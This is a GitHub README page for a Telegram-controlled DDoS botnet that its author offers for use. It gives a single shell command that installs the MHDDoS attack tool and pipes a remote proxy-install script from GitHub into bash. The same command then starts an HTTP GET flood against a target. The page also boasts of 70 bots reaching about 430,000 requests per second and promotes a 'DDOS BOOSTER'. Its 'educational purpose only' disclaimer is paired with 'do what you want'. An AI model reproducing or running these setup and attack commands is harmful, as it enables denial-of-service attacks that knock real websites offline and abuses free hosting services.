Mehliug-git / DDOS_Telegram_BOT

Simple DDOS botnet in telegram

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

DDOS Botnet Sample

DDOS BotNet for telegram, just make differents version of this bot with differents telegram token (in .env file pls).

And host it ! (I use GLITCH for simple and free host)

How use it ?

Just clone the repo on your hosting server, make a .env file with a TELEGRAM_TOKEN variable with your telegram token key, and make a NUM variable with the name of the bot.

In the shell of your hosting server make this config command :
/usr/bin/python3 -m pip install --upgrade pip && pip3 uninstall telegram && pip3 uninstall telegram-bot python-telegram-bot && pip3 install -r requirements.txt &&git clone https://github.com/MatrixTM/MHDDoS.git && cd MHDDoS && pip3 install -r requirements.txt && curl -s https://raw.githubusercontent.com/SlavaUkraineSince1991/DDoS-for-all/main/scripts/python_git_MHDDoS_proxy_install.sh | bash && python3 ~/MHDDoS/start.py GET example.com 1 100 mhddos_proxy/list 100 5
Now hit the URL of the bot for start (only if your hosting sleep your project in free mode like Glitch), you can also make a bot for start all other bot.

The installation tutorial is not finished, if you have any problems I can help you.



[+] NEW ! You can now upgrade your requests/s using my DDOS BOOSTER ! It's just a DDOS bot without Telegram, just get a URL and start DDOS !

[+] NEW ! : If you just want to test your infrastrucutre open me an Issue and have done this together !!

In my Botnet I have actually 70 bots, I can go up to ~ 430 000 requests /s

Just for educational purpose only, Do, what you want I don’t give a fuck, but it’s not my fault you’re in trouble.

About

Simple DDOS botnet in telegram


Languages

Language:Python 100.0%